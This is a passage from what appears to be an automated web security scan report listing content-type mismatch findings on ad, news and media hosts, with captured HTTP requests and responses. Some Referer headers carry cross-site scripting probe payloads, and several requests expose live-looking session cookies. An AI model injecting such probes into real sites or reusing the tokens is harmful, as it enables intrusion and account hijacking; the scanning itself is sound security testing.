Cookie: __qca=P0-853758375-1305746649439; OAID=4b24811b2bad0c1235f0fb9f9e199204

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:48 GMT
Server: VoxCAST
Last-Modified: Mon, 09 May 2011 01:03:27 GMT
x-amz-id-2: GGlbHF4l2hZ1SjMCANZCM6ZX+M79BBNi0CINq4nmMarUBXOik5L4/7wfSIOe2gE5
x-amz-request-id: 88F5956637C82A3C
Cache-Control: public, max-age=31557600
Expires: Wed, 09 May 2012 01:03:26 GMT
ETag: "104e40081cc1109070a63634ae2d57e8"
Accept-Ranges: bytes
Content-Length: 2153
X-Cache: HIT from VoxCAST
Age: 64995
Content-Type: image/jpeg

.PNG
.
...IHDR... ... .....szz.....bKGD.......C.... pHYs...H...H.F.k>... vpAg... ... ........GIDATX....n]......3.{E.r.HQ.-...C..ge..e.J.'y.d...,..b......v`.bDP.Eq..;......R......A........~.....~}..
...[SNIP]...

26.25. http://cm.npc-lee.overture.com/partner/css/ads.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cm.npc-lee.overture.com
Path:	/partner/css/ads.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /partner/css/ads.css HTTP/1.1
Host: cm.npc-lee.overture.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-lee.overture.com/js_1_0/?config=3514931570&type=sports&keywordCharEnc=utf8&source=npc_lee_southernillinoisian_t1_ctxt&adwd=300&adht=250&ctxtUrl=http%3A%2F%2Fwww.thesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&bg=FFFFFF&bc=FFFFFF&cc=FFFFFF&lc=254264&tc=333333&uc=999999&du=1&cb=1307962881243&ctxtContent=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCydLR0cAAypWCg0=

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, max-age=86400
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 923

<style type=text/css>

.clsResult
{
background: #dddec8;
margin: 0px 0px;
padding: 1px 1px;
}
.clsResultTitle
{
font-family: Verdana, Ari
...[SNIP]...

26.26. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dyn-cache.kotaku.com
Path:	/static/sidebar/kotaku.com/latest.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.27. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dyn-cache.kotaku.com
Path:	/static/sidebar/kotaku.com/latest/1307750400.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.28. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&uid=KxwltwQfcXn0PkkN_1000014620118&xy=44%2C2676&wh=1065%2C926&vchannel=Centro&cid=Zenith-Sonic&iad=1307962922145-25851937336847188&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

26.29. http://expedia-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://expedia-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=expedia&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: expedia-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:27:02 GMT
Content-Length: 78161

baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

26.30. http://hollywoodcrush.mtv.com/wp-content/themes/charlie_default/community/flux.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hollywoodcrush.mtv.com
Path:	/wp-content/themes/charlie_default/community/flux.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wp-content/themes/charlie_default/community/flux.inc HTTP/1.1
Host: hollywoodcrush.mtv.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1; s_nr=1307963913916; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=27; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774

Response

HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Tue, 04 May 2010 20:21:18 GMT
ETag: "1d85029-2a0-485ca73b56b80"
Accept-Ranges: bytes
Content-Length: 672
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:34:16 GMT
Connection: close

// active click through on flux comment count
$j(function(){

$j('#posts .post .post_footer .commentCount .txtLabel').live('mouseover', function(){
$j(this).css({
'text-decoration':'unde
...[SNIP]...

26.31. http://kotaku.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kotaku.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8;

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

26.32. http://l.apture.com/v3/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l.apture.com
Path:	/v3/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v3/?1=%7B%22fullBarEnabled%22%3Afalse%2C%22numLinks%22%3A0%2C%22numTmmLinks%22%3A0%2C%22socialLinkCount%22%3A0%2C%22socialLinkStatus%22%3A207%2C%22userSocialLinksDisabled%22%3Afalse%2C%22type%22%3A1131%2C%22siteId%22%3A79096%2C%22visitId%22%3A23247798873571%2C%22pageId%22%3A343348986%7D&AC=s4te21hWKP HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 13 Jun 2011 11:19:10 GMT
Connection: close

{}

26.33. http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://l.yimg.com
Path:	/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 10:42:12 GMT
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 10:42:12 GMT
Last-Modified: Sat, 14 Feb 2009 00:41:32 GMT
Accept-Ranges: bytes
Content-Length: 985
Content-Type: image/jpeg
Age: 1159
Proxy-Connection: keep-alive
Server: YTS/1.19.5

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE..T.FE40..ji...)......CoI...l..x......hee......I/.l9.JI.....-D32..E...zhLp.PA4mQ).....*.g.......GCC.j6...d[Q....J9.....
...[SNIP]...

26.34. http://mediacdn.disqus.com/1307735099/fonts/disqus-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mediacdn.disqus.com
Path:	/1307735099/fonts/disqus-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1307735099/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1307123702.5.5.utmcsr=pcmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article2/0,2817,2386340,00.asp; __utma=113869458.981292312.1305368048.1306977215.1307123702.5

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 10 Jun 2011 21:38:30 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 101212265 81285192
Cache-Control: max-age=2542582
Expires: Tue, 12 Jul 2011 21:40:29 GMT
Date: Mon, 13 Jun 2011 11:24:07 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

26.35. http://moviesblog.mtv.com/wp-content/themes/charlie_default/community/flux.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://moviesblog.mtv.com
Path:	/wp-content/themes/charlie_default/community/flux.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /wp-content/themes/charlie_default/community/flux.inc HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2
Last-Modified: Tue, 04 May 2010 20:21:18 GMT
ETag: "1d85029-2a0-485ca73b56b80"
Accept-Ranges: bytes
Content-Length: 672
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:18:03 GMT
Connection: close

// active click through on flux comment count
$j(function(){

$j('#posts .post .post_footer .commentCount .txtLabel').live('mouseover', function(){
$j(this).css({
'text-decoration':'unde
...[SNIP]...

26.36. http://my.yahoo.com/e/df previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.yahoo.com
Path:	/e/df

Issue detail

The response contains the following Content-type statement:

Content-Type: text/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /e/df HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
Content-Length: 177
Origin: http://my.yahoo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=wl5nAgw8OKEn_MnPELISjekFopwmUV6I0RVCQ6cf3P7WctxzgNQb6r6e4.AVwh2DrKWH6cnP1G79CGbgy4_dRSBXvHHADyYw1sZORkUfyjjj.NBdpSofp07kjBZVrBsnS0t6EWOCBOo8ZKNbVbgIDBcvzBT0VmnMcmnekdBDGm3S5GWc0uY0MEc7j_4gUC09ScPNrDW9.Pfx6s7MNCk8CuKpUqJvqZGA0LYBfmYcVRXhHYyY6aGNtUUuDS1x9pSoeE8Ig0cHtBAuqIOqRcBxu99GEjfM_TQ3W6JFTPYrnw82cQh04tF0e2jrjjlIaWAD8X58pxD.XSq7bvVUgNV2f5AND1MTajMspX0qIyDWzeQNP15Vvcg_NOwUfXXwmHi7QtFFG5o_C2IiverRBCtdbhLNmq99paOoeV6n_0DLETv2MfUHeC2Epfn93D6d.HIl4mwZE_yYPtgYDgO7HzVY24e0GHHLdJL9q1f5UXqjS8oLL2IGxUg.sE0BhIrT1SHgdvXnG8q4Uq9.nDj.JHOUEF0TcEyxyedTMX30CV2difMivJ6pi6ONlLZPryKJ2R5Hc6aeIj2BoGc.h_XMFOpJ0ppNA5v_XMNYh9vXIJqnAs60yNTxabQxUF23vn.ws6wObybT_UPb6JJsC9GDkqRYjXmnx45HaRp.vxvp6FzWBWLOk9b_nfo2VXW3ANyKpGSdlVYb9.iXvrDjkfSJred4&v=2; MYTMI=8

_crumb=O2424dQlFYL1lvSkhHTkM.&_mode=json&_json=%5B%7B%22_action%22%3A%22show%22%2C%22_container%22%3A0%2C%22_id%22%3A%22b4c875%22%2C%22_tags%22%3A%5B%5D%2C%22_txnid%22%3A3%7D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjlrbnBhdTU2dmJzYmciO3M6MjoibXQiO2k6MTMwNzk2NDAwNTt9; expires=Thu, 13-Jun-2013 11:20:05 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:20:05 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Sun, 13-Jun-2010 11:20:05 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"3"}]

26.37. http://my.yahoo.com/e/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.yahoo.com
Path:	/e/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

26.38. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pglb.buzzfed.com
Path:	/63975/3848554c08824c2e6b4e5963f6d2d7e2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /63975/3848554c08824c2e6b4e5963f6d2d7e2?callback=BF_PARTNER.gate_response&cb=5877 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=572982
Expires: Mon, 20 Jun 2011 02:28:20 GMT
Date: Mon, 13 Jun 2011 11:18:38 GMT
Connection: close

BF_PARTNER.gate_response(1307932071);

26.39. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pglb.buzzfed.com
Path:	/83240/6ff44b0268185d901ef2d93cd3d3a48f

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /83240/6ff44b0268185d901ef2d93cd3d3a48f?callback=BF_PARTNER.gate_response&cb=2206 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=382291
Expires: Fri, 17 Jun 2011 21:35:36 GMT
Date: Mon, 13 Jun 2011 11:24:05 GMT
Connection: close

BF_PARTNER.gate_response(1307740416);

26.40. http://platform.twitter.com/widgets.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://platform.twitter.com
Path:	/widgets.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /widgets.js?ver=20110531 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:46 GMT
ETag: "adb9ae91aac3c00a495601f50726ba52"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 18411
Date: Mon, 13 Jun 2011 11:17:59 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

(function(a,b){function L(){a.using=m,a.provide=n,a.define=o,a.loadrunner=p;return K}function J(a){var b,c;for(var d=0,e;e=H.matchers[d];d++){var f=e[0],g=e[1];if(b=a.match(f))return g(a)}throw new Er
...[SNIP]...

26.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1648
Date: Mon, 13 Jun 2011 11:19:39 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:32 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:32 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...

26.42. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://spd.pointroll.com
Path:	/PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=0&delay=0&push=0&set=2&bye=1&intact=3 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
